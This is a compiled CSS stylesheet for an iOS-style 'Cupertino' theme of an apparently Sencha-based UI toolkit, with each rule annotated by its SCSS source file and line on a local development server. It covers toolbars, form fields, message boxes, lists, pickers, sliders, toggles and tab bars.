/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:31 */
.x-menu.x-left,
.x-menu.x-right {
width: 220px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:37 */
.x-menu.x-left:before {
border-right-width: 1px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:43 */
.x-menu.x-right:before {
border-left-width: 1px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:49 */
.x-menu.x-top:before {
border-bottom-width: 1px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:55 */
.x-menu.x-bottom:before {
border-top-width: 1px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:1 */
.x-toolbar {
background-color: #f8f9f9;
min-height: 2.85em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:5 */
.x-toolbar.x-docked-bottom {
border-top: 1px solid #ccc;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:9 */
.x-toolbar.x-docked-top {
border-bottom: 1px solid #ccc;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:11 */
.x-toolbar.x-docked-top .x-button {
padding-top: .15em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:16 */
.x-toolbar.x-docked-left {
border-right: 1px solid #ccc;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:20 */
.x-toolbar.x-docked-right {
border-left: 1px solid #ccc;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:24 */
.x-toolbar .x-title {
color: #000;
font-weight: 500;
font-size: 1em;
padding-top: .3em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:31 */
.x-toolbar .x-button {
border: 0;
background-color: transparent;
margin: 0 5px;
height: 2.0em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toolbar.scss:38 */
.x-toolbar .x-button-label,
.x-toolbar .x-badge {
font-size: 1.1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:8 */
.x-field {
min-height: 2.5em;
background: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:12 */
.x-field:last-child {
border-bottom: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:17 */
.x-field-input {
border: 1px solid #ccc;
border-radius: 5px;
background-color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:18 */
.x-field-input .x-clear-icon {
background: url(images/clear_icon.png) no-repeat;
background-position: center center;
background-size: 55% 55%;
width: 2.2em;
height: 2.2em;
margin: .5em;
margin-top: -1.1em;
right: -.5em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:35 */
.x-field-clearable .x-field-input {
padding-right: 2.2em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:40 */
.x-input-el {
background: transparent;
padding: .7em .4em .4em .4em;
min-height: 2.5em;
border-width: 0;
-webkit-appearance: none;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:48 */
.x-ie .x-input-el {
background: transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:53 */
.x-item-disabled .x-form-label,
.x-item-disabled input,
.x-item-disabled .x-input-el,
.x-item-disabled .x-spinner-body,
.x-item-disabled select,
.x-item-disabled textarea,
.x-item-disabled .x-field-clear-container {
color: #b3b3b3;
pointer-events: none;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:65 */
.x-item-disabled .x-form-label {
color: #aaa;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:69 */
.x-item-disabled .x-form-label:after {
color: #666 !important;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:74 */
.x-toolbar .x-field {
background: transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:77 */
.x-toolbar .x-field .x-component-outer {
padding: .4em .6em 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:81 */
.x-toolbar .x-field .x-input-el {
padding: .3em .6em;
min-height: 1.4em;
background: transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:88 */
.x-toolbar .x-field-input {
position: relative;
background: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:93 */
.x-toolbar .x-field-clearable .x-field-input {
padding-right: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Field.scss:97 */
.x-toolbar .x-clear-icon {
position: absolute;
top: .9em;
right: -.7em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/TextArea.scss:1 */
.x-field-textarea textarea {
min-height: 7em;
padding-top: .5em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:5 */
.x-msgbox {
padding: 0px;
margin: 0px;
max-width: 19em;
border: 0px;
background-image: -webkit-linear-gradient(top, #e7e8e8 1%, #d8ddde 25%, #e7e8e8 100%);
background-image: -moz-linear-gradient(top, #e7e8e8 1%, #d8ddde 25%, #e7e8e8 100%);
background-image: -o-linear-gradient(top, #e7e8e8 1%, #d8ddde 25%, #e7e8e8 100%);
background-image: -ms-linear-gradient(top, #e7e8e8 1%, #d8ddde 25%, #e7e8e8 100%);
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:13 */
.x-msgbox .x-icon {
margin: 0 0.8em 0 0.5em;
background: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:19 */
.x-msgbox .x-msgbox-warning .x-button,
.x-msgbox x-msgbox-error .x-button {
border-color: #fc3e39;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:21 */
.x-msgbox .x-msgbox-warning .x-button .x-button-label,
.x-msgbox .x-msgbox-warning .x-button .x-badge,
.x-msgbox x-msgbox-error .x-button .x-button-label,
.x-msgbox x-msgbox-error .x-button .x-badge {
color: #fc3e39;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:27 */
.x-msgbox .x-msgbox-title {
margin-top: 5px;
margin-left: 10px;
margin-right: 10px;
min-height: 1.5em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:33 */
.x-msgbox .x-msgbox-title .x-title {
font-size: 1.2em;
padding: 0px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:40 */
.x-msgbox .x-dock-body {
margin: 10px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:44 */
.x-msgbox .x-body {
background: transparent !important;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:48 */
.x-msgbox .x-toolbar {
background: transparent none;
-webkit-box-shadow: none;
-moz-box-shadow: none;
box-shadow: none;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:52 */
.x-msgbox .x-toolbar.x-docked-top {
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:57 */
.x-msgbox .x-field {
padding-top: .5em;
min-height: .8em;
margin: 0 0 .6em 0;
background: transparent;
-webkit-border-radius: 0;
-moz-border-radius: 0;
-ms-border-radius: 0;
-o-border-radius: 0;
border-radius: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:65 */
.x-msgbox .x-field-input {
padding-right: 2.2em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:69 */
.x-msgbox .x-form-field {
min-height: .8em;
padding: .3em;
padding-right: 0 !important;
-webkit-appearance: none;
background: transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:78 */
.x-msgbox-text {
color: #000;
font-size: .9em;
font-weight: 400;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:86 */
.x-msgbox {
-webkit-border-radius: 7px;
-moz-border-radius: 7px;
-ms-border-radius: 7px;
-o-border-radius: 7px;
border-radius: 7px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:88 */
.x-msgbox .x-msgbox-buttons {
padding: 0;
height: auto;
min-height: auto;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:93 */
.x-msgbox .x-msgbox-buttons .x-toolbar-inner {
-webkit-box-align: end;
-ms-flex-align: end;
align-items: flex-end;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:96 */
.x-msgbox .x-msgbox-buttons .x-toolbar-inner .x-button {
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
-webkit-border-radius: 0px;
-moz-border-radius: 0px;
-ms-border-radius: 0px;
-o-border-radius: 0px;
border-radius: 0px;
background-color: transparent;
border: 1px solid #9da1a0;
border-bottom-width: 0px;
height: 40px;
margin: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:106 */
.x-msgbox .x-msgbox-buttons .x-toolbar-inner .x-button:first-child {
border-left-width: 0px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:110 */
.x-msgbox .x-msgbox-buttons .x-toolbar-inner .x-button:last-child {
border-left-width: 0px;
border-right-width: 0px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:115 */
.x-msgbox .x-msgbox-buttons .x-toolbar-inner .x-button.x-button-pressing {
background-color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/MessageBox.scss:119 */
.x-msgbox .x-msgbox-buttons .x-toolbar-inner .x-button .x-button-label,
.x-msgbox .x-msgbox-buttons .x-toolbar-inner .x-button .x-badge {
font-size: .9em;
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/SegmentedButton.scss:2 */
.x-toolbar .x-segmentedbutton .x-button,
.x-segmentedbutton .x-button {
margin: 0 !important;
border: 1px solid #157efb;
border-right: 0;
-webkit-border-radius: 0;
-moz-border-radius: 0;
-ms-border-radius: 0;
-o-border-radius: 0;
border-radius: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/SegmentedButton.scss:8 */
.x-toolbar .x-segmentedbutton .x-button.x-button-pressed,
.x-segmentedbutton .x-button.x-button-pressed {
background-color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/SegmentedButton.scss:10 */
.x-toolbar .x-segmentedbutton .x-button.x-button-pressed .x-button-label,
.x-toolbar .x-segmentedbutton .x-button.x-button-pressed .x-badge,
.x-segmentedbutton .x-button.x-button-pressed .x-button-label,
.x-segmentedbutton .x-button.x-button-pressed .x-badge {
color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/SegmentedButton.scss:16 */
.x-toolbar .x-segmentedbutton .x-first,
.x-segmentedbutton .x-first {
-moz-border-radius-topleft: 6px;
-webkit-border-top-left-radius: 6px;
border-top-left-radius: 6px;
-moz-border-radius-bottomleft: 6px;
-webkit-border-bottom-left-radius: 6px;
border-bottom-left-radius: 6px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/SegmentedButton.scss:20 */
.x-toolbar .x-segmentedbutton .x-last,
.x-segmentedbutton .x-last {
-moz-border-radius-topright: 6px;
-webkit-border-top-right-radius: 6px;
border-top-right-radius: 6px;
-moz-border-radius-bottomright: 6px;
-webkit-border-bottom-right-radius: 6px;
border-bottom-right-radius: 6px;
border-right: 1px solid #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toast.scss:5 */
.x-toast {
-webkit-border-radius: 7px;
-moz-border-radius: 7px;
-ms-border-radius: 7px;
-o-border-radius: 7px;
border-radius: 7px;
padding: 0px;
margin: 0px;
max-width: 19em;
border: 1px;
background-color: #fff;
border-color: #dbdbe0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Toast.scss:14 */
.x-toast .x-toast-text {
padding: 2em;
color: #157efb;
font-size: .9em;
font-weight: 400;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/carousel/Indicator.scss:1 */
.x-carousel-indicator span {
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
-ms-border-radius: 5px;
-o-border-radius: 5px;
border-radius: 5px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/carousel/Indicator.scss:4 */
.x-carousel-indicator span.x-carousel-indicator-active {
background-color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/IndexBar.scss:1 */
.x-indexbar-vertical {
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:5 */
.x-list {
background-color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:8 */
.x-list .x-list-disclosure {
border: 0px;
background-color: transparent;
margin: 10px 15px 10px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:13 */
.x-list .x-list-disclosure:before {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
content: '!';
font-family: 'iOS7';
color: #ccc;
font-size: 14px;
text-align: center;
background-color: transparent;
line-height: 26px;
padding-left: 2px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:26 */
.x-list .x-list-item {
color: #000;
font-weight: 400;
border-top: 1px solid transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:31 */
.x-list .x-list-item.x-item-pressed {
background-color: #d9d9d9;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:35 */
.x-list .x-list-item.x-item-selected.x-list-item-tpl {
background-color: #e6e6e6;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:37 */
.x-list .x-list-item.x-item-selected.x-list-item-tpl .x-list-disclosure {
background-color: transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:42 */
.x-list .x-list-item .x-list-item-body,
.x-list .x-list-item.x-list-item-tpl .x-innerhtml {
padding: .7em 1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:47 */
.x-list .x-list-item.x-list-item-tpl:before {
content: '';
display: block;
position: absolute;
bottom: -1px;
left: 1em;
right: 0px;
border-bottom: solid 1px #dbdbe0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:57 */
.x-list .x-list-item.x-item-pressed.x-list-item-tpl:before,
.x-list .x-list-item.x-item-selected.x-list-item-tpl:before,
.x-list .x-list-item.x-list-footer-wrap.x-list-item-tpl:before {
border-bottom: solid 1px transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:63 */
.x-list .x-list-header {
background-color: #f7f7f7;
border: 0px;
padding: 0em 1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/dataview/List.scss:67 */
.x-list .x-list-header .x-innerhtml {
font-size: 1.2em;
font-weight: 600;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Checkbox.scss:10 */
.x-checkmark-base,
.x-field-checkbox .x-field-mask::after,
.x-field-radio .x-field-mask::after {
position: absolute;
top: 0;
right: 12px;
bottom: 0;
content: '3';
font-family: 'Pictos';
font-size: 1.3em;
text-align: right;
line-height: 2.1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Checkbox.scss:25 */
.x-field-checkbox .x-field-mask::after,
.x-field-radio .x-field-mask::after {
color: #ccc;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Checkbox.scss:30 */
.x-input-checkbox,
.x-input-radio {
visibility: hidden;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Checkbox.scss:35 */
.x-input-checkbox:checked + .x-field-mask::after {
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Checkbox.scss:40 */
.x-item-disabled .x-input-checkbox:checked + .x-field-mask::after {
color: #79b5fd;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:5 */
.x-picker {
background-color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:8 */
.x-picker .x-toolbar {
border-top: 1px solid #d9d9d9;
-webkit-border-radius: 0;
-moz-border-radius: 0;
-ms-border-radius: 0;
-o-border-radius: 0;
border-radius: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:14 */
.x-picker .x-picker-inner {
background-color: #fff;
overflow: hidden;
margin: 0px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:20 */
.x-picker-bar {
border-top: .12em solid #d9d9d9;
border-bottom: .12em solid #d9d9d9;
height: 2.5em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:27 */
.x-use-titles .x-picker-bar {
margin-top: 1.5em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:32 */
.x-picker-slot-title {
height: 1.5em;
padding: 0.2em 1.02em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:36 */
.x-picker-slot-title > div {
font-size: 0.8em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:42 */
.x-picker-slot .x-dataview-item {
height: 2.5em;
line-height: 2.5em;
font-weight: bold;
padding: 0 10px;
color: #000;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/picker/Picker.scss:50 */
.x-picker-slot .x-dataview-item.x-item-selected {
color: #000;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Radio.scss:5 */
.x-field-radio .x-field-mask::after {
color: transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Radio.scss:10 */
.x-input-radio:checked + .x-field-mask::after {
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Radio.scss:15 */
.x-item-disabled .x-input-radio:checked + .x-field-mask::after {
color: #79b5fd;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Select.scss:5 */
.x-panel.x-select-overlay {
padding: 8px;
background-color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Select.scss:9 */
.x-panel.x-select-overlay > .x-panel-inner {
overflow: hidden;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Select.scss:13 */
.x-panel.x-select-overlay .x-list {
background: transparent !important;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Slider.scss:8 */
.x-slider,
.x-toggle {
height: 2.1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Slider.scss:13 */
.x-slider.x-item-disabled {
opacity: 0.6;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Slider.scss:17 */
.x-thumb {
height: 2.1em;
width: 2.1em;
background: transparent none;
border: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Slider.scss:24 */
.x-thumb:after {
content: '';
position: absolute;
width: 1.75em;
height: 1.75em;
top: 0.175em;
left: 0.175em;
-webkit-box-shadow: 0 2px 1px rgba(0, 0, 0, 0.3);
-moz-box-shadow: 0 2px 1px rgba(0, 0, 0, 0.3);
box-shadow: 0 2px 1px rgba(0, 0, 0, 0.3);
-webkit-border-radius: 0.875em;
-moz-border-radius: 0.875em;
-ms-border-radius: 0.875em;
-o-border-radius: 0.875em;
border-radius: 0.875em;
background-color: #fff;
border: .1em solid #dbdbdb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Slider.scss:32 */
.x-thumb.x-dragging {
opacity: 1;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Slider.scss:34 */
.x-thumb.x-dragging:after {
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Slider.scss:41 */
.x-slider:before {
margin: 0 0.875em;
border-bottom: 0;
background-color: #b5b5b6;
content: '';
position: absolute;
width: auto;
height: .2em;
top: 0.9875em;
left: 0;
-webkit-border-radius: 0.1em;
-moz-border-radius: 0.1em;
-ms-border-radius: 0.1em;
-o-border-radius: 0.1em;
border-radius: 0.1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Slider.scss:7 */
.x-slider-field .x-component-outer,
.x-toggle-field .x-component-outer {
padding: .6em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:2 */
.x-desktop.x-windows.x-chrome .x-spinner .x-spinner-button-down {
line-height: .7em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:6 */
.x-desktop.x-windows.x-chrome .x-spinner .x-spinner-button-up {
line-height: .85em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:12 */
.x-spinner .x-spinner-button {
margin-top: .25em;
margin-bottom: .25em;
width: 2em;
border: 2px solid #fff !important;
-webkit-border-radius: 1em;
-moz-border-radius: 1em;
-ms-border-radius: 1em;
-o-border-radius: 1em;
border-radius: 1em;
width: 1em;
height: 1em;
margin: 7px 7px 0 0;
color: #fff;
font-weight: 200;
font-size: 1.8em;
line-height: .56em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:19 */
.x-spinner .x-spinner-button.x-spinner-button-down {
background-color: #fc3e39;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:23 */
.x-spinner .x-spinner-button.x-spinner-button-up {
background-color: #53d769;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:37 */
.x-spinner .x-input-el {
color: black;
-webkit-text-fill-color: black;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:43 */
.x-spinner.x-item-disabled .x-input-el {
color: #b3b3b3;
-webkit-text-fill-color: #b3b3b3;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:49 */
.x-spinner.x-item-disabled .x-spinner-button.x-spinner-button-down {
background-color: #fea09d;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/field/Spinner.scss:53 */
.x-spinner.x-item-disabled .x-spinner-button.x-spinner-button-up {
background-color: #a6eab1;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Toggle.scss:5 */
.x-toggle {
width: 50px;
height: 28px;
border: 2px solid #e5e5e5;
background-color: transparent;
-webkit-border-radius: 22px;
-moz-border-radius: 22px;
-ms-border-radius: 22px;
-o-border-radius: 22px;
border-radius: 22px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Toggle.scss:16 */
.x-toggle:before {
-webkit-border-radius: 22px;
-moz-border-radius: 22px;
-ms-border-radius: 22px;
-o-border-radius: 22px;
border-radius: 22px;
content: '';
background-color: white;
position: absolute;
top: 0px;
left: 0px;
right: 0px;
bottom: 0px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Toggle.scss:27 */
.x-toggle .x-thumb {
width: 22px;
height: 22px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Toggle.scss:31 */
.x-toggle .x-thumb.x-dragging {
opacity: 1;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Toggle.scss:35 */
.x-toggle .x-thumb:after {
top: 0px;
left: 0px;
width: 22px;
height: 22px;
-webkit-border-radius: 22px;
-moz-border-radius: 22px;
-ms-border-radius: 22px;
-o-border-radius: 22px;
border-radius: 22px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Toggle.scss:45 */
.x-toggle-on {
background-color: #53d769;
border-color: #53d769;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/slider/Toggle.scss:49 */
.x-toggle-on:before {
background-color: #53d769;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/FieldSet.scss:5 */
.x-form-fieldset {
margin: 0px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/FieldSet.scss:8 */
.x-form-fieldset .x-form-fieldset-inner {
background: #fff;
padding: 0;
border-color: #dbdbe0;
-webkit-border-radius: 0;
-moz-border-radius: 0;
-ms-border-radius: 0;
-o-border-radius: 0;
border-radius: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/FieldSet.scss:16 */
.x-form-fieldset .x-field {
background: transparent;
position: relative;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/FieldSet.scss:20 */
.x-form-fieldset .x-field:before {
content: '';
display: block;
position: absolute;
bottom: 0px;
left: 1em;
right: 0px;
border-bottom: solid 1px #dbdbe0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/FieldSet.scss:31 */
.x-form-fieldset .x-field:last-child:before {
border-bottom: solid 1px transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/FieldSet.scss:40 */
.x-form-fieldset-title {
margin: 2em .5em .5em 1em;
color: #555;
font-weight: 400;
font-size: .9em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/FieldSet.scss:47 */
.x-form-fieldset-instructions {
color: #555;
margin: 1em;
font-size: .8em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/Panel.scss:6 */
.x-form .x-scroll-container {
background-color: #edebf1;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/Panel.scss:10 */
.x-form > input[type=submit] {
display: none;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/Panel.scss:14 */
.x-form .x-field .x-field-input,
.x-form .x-field .x-input-el {
font-weight: 300;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/Panel.scss:20 */
.x-form.x-floating .x-input-el {
padding-top: .5em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/Panel.scss:25 */
.x-form .x-field .x-field-input {
border: 0px;
background-color: transparent;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/Panel.scss:31 */
.x-form-label {
padding: .6em .6em .6em 1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/Panel.scss:34 */
.x-form-label span {
font-size: 1.1em;
font-weight: 400;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/form/Panel.scss:40 */
.x-form-fieldset .x-form-fieldset-inner {
border-top: 1px solid #d9d9d9;
border-bottom: 1px solid #d9d9d9;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/grid/Grid.scss:1 */
.x-grid .x-grid-header {
background-color: #f7f7f7;
border: 0;
padding: 0 1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/grid/Grid.scss:5 */
.x-grid .x-grid-header .x-innerhtml {
font-size: 1.2em;
font-weight: 600;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/plugin/PullRefresh.scss:5 */
.x-list-pullrefresh-arrow {
background: center center url(images/pullarrow.png.png) no-repeat;
background-size: 2em 3em;
-webkit-transition-property: -webkit-transform;
-webkit-transition-duration: 200ms;
-webkit-transform: rotate(0deg);
-moz-transform: rotate(0deg);
-ms-transform: rotate(0deg);
-o-transform: rotate(0deg);
transform: rotate(0deg);
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/plugin/PullRefresh.scss:13 */
.x-android-2 .x-list-pullrefresh-arrow {
-webkit-transition-property: none;
-webkit-transition-duration: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/plugin/PullRefresh.scss:18 */
.x-list-pullrefresh-release .x-list-pullrefresh-arrow {
-webkit-transform: rotate(-180deg);
-moz-transform: rotate(-180deg);
-ms-transform: rotate(-180deg);
-o-transform: rotate(-180deg);
transform: rotate(-180deg);
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/plugin/PullRefresh.scss:22 */
.x-list-pullrefresh-message {
margin-bottom: 0.1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/plugin/field/PlaceHolderLabel.scss:3 */
.x-placeholderlabel.x-field-focused .x-form-label {
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:1 */
.x-tabbar {
min-height: 3em;
background-color: #f9f9f9;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:5 */
.x-tabbar.x-docked-bottom {
min-height: 3.1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:10 */
.x-tab {
height: 2.9em;
margin: 0 .2em;
border: 0;
background: transparent;
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:18 */
.x-tab-active {
background: rgba(255, 255, 255, 0.15);
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:24 */
.x-tab.x-tab-active x-button-label {
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:28 */
.x-tab.x-tab-active .x-button-icon:before,
.x-tab.x-tab-active .x-button-label,
.x-tab.x-tab-active .x-badge {
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:33 */
.x-tab .x-button-label,
.x-tab .x-badge {
font-size: .65em;
font-weight: 400;
color: #929292;
line-height: 3em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:40 */
.x-tab .x-button-icon {
display: block;
width: 1.5em;
height: 1.5em;
margin: 0 auto;
-webkit-text-stroke-width: .35px;
-webkit-text-stroke-color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:48 */
.x-tab .x-button-icon .x-button-icon.x-hidden {
display: none;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:52 */
.x-tab .x-button-icon:before {
color: transparent;
font-size: 1.8em;
line-height: 1.35em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:59 */
.x-tab .x-badge {
top: 0px;
left: 55%;
right: auto;
max-width: 55%;
font-size: .65em;
line-height: 1.5em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:70 */
.x-tabbar.x-docked-top {
padding: 10px;
}
